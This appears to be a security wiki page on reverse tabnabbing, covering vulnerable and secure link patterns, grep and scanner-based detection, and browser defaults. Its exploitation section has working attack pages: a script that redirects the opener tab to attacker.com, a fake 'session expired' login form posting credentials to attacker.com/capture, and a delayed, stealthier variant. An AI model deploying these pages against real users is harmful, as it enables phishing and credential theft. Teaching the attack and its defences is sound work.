Tabnabbing

Tabnabbing (reverse tabnabbing) allows an attacker-controlled page to rewrite the content of a parent page, typically replacing it with a phishing site.

How It Works

Victim clicks a link that opens in a new tab (target="_blank")
The new page has access to window.opener (the original page)
Attacker's page executes: window.opener.location = "https://phishing-site.com"
Original tab silently redirects to phishing site
Victim returns to original tab, sees fake login, enters credentials

Vulnerable Code Pattern

<!-- VULNERABLE: No rel attribute -->
<a href="https://attacker.com" target="_blank">Click me</a>

<!-- VULNERABLE: Empty rel attribute -->
<a href="https://attacker.com" target="_blank" rel="">Click me</a>

<!-- VULNERABLE: Only noreferrer (still allows opener access in some browsers) -->
<a href="https://attacker.com" target="_blank" rel="noreferrer">Click me</a>

Secure Code Pattern

<!-- SECURE: noopener prevents window.opener access -->
<a href="https://external.com" target="_blank" rel="noopener">Click me</a>

<!-- SECURE: Both noopener and noreferrer -->
<a href="https://external.com" target="_blank" rel="noopener noreferrer">Click me</a>

<!-- SECURE: Modern browsers auto-add noopener, but explicit is better -->

Detection

Manual Testing

# Find vulnerable links
grep -rn 'target="_blank"' . | grep -v 'noopener'
grep -rn 'target=\\"_blank\\"' . | grep -v 'noopener'

# Check in browser DevTools
# Elements tab → search: target="_blank"
# Verify each has rel="noopener"

Automated Scanning

# Using nuclei
nuclei -t http/vulnerabilities/generic/tabnabbing-check.yaml -u https://target.com

# Using custom grep on crawled pages
katana -u https://target.com -d 3 | while read url; do
  curl -s "$url" | grep -oP '<a[^>]*target="_blank"[^>]*>' | grep -v 'noopener'
done

Exploitation

Basic Attack Page

<!-- attacker.com/evil.html -->
<!DOCTYPE html>
<html>
<head><title>Interesting Article</title></head>
<body>
<h1>Loading content...</h1>
<script>
if (window.opener) {
    // Redirect parent to phishing page
    window.opener.location = "https://attacker.com/phishing.html";
}
</script>
</body>
</html>

Phishing Page

<!-- attacker.com/phishing.html (looks like target) -->
<!DOCTYPE html>
<html>
<head><title>Target.com - Session Expired</title></head>
<body>
<h1>Your session has expired</h1>
<form action="https://attacker.com/capture" method="POST">
    <input type="text" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <button type="submit">Login</button>
</form>
</body>
</html>

Delayed Attack (More Stealthy)

// Wait before redirecting (victim less likely to notice)
setTimeout(function() {
    if (window.opener) {
        window.opener.location = "https://attacker.com/phishing.html";
    }
}, 5000); // 5 seconds delay

Attack Scenarios

Scenario

Description

Forum posts

User-submitted links with target="_blank"

Comments

Blog/article comment sections

User profiles

Profile links to external sites

Documentation

Links to external resources

Email links

Webmail rendering links

Browser Behavior

Browser

Default Behavior (2024+)

Chrome 88+

Implicitly adds noopener

Firefox 79+

Implicitly adds noopener

Safari 12.1+

Implicitly adds noopener

Edge 88+

Implicitly adds noopener

Note: While modern browsers add implicit protection, explicit rel="noopener" is still recommended for older browser support and code clarity.

window.open() Vulnerability

// VULNERABLE
window.open('https://attacker.com');

// SECURE
window.open('https://external.com', '_blank', 'noopener,noreferrer');

XSS - Can be used to inject malicious links
Phishing - Tabnabbing enables phishing
CSRF - Related browser security issues

PreviousVHosts NextWeb Technologies

Last updated 8 days ago

Was this helpful?

hashtagHow It Works

hashtagVulnerable Code Pattern

hashtagSecure Code Pattern

hashtagDetection

hashtagManual Testing

hashtagAutomated Scanning

hashtagExploitation

hashtagBasic Attack Page

hashtagPhishing Page

hashtagDelayed Attack (More Stealthy)

hashtagAttack Scenarios

hashtagBrowser Behavior

hashtagwindow.open() Vulnerability

hashtagRelated Topics

How It Works

Vulnerable Code Pattern

Secure Code Pattern

Detection

Manual Testing

Automated Scanning

Exploitation

Basic Attack Page

Phishing Page

Delayed Attack (More Stealthy)

Attack Scenarios

Browser Behavior

window.open() Vulnerability

Related Topics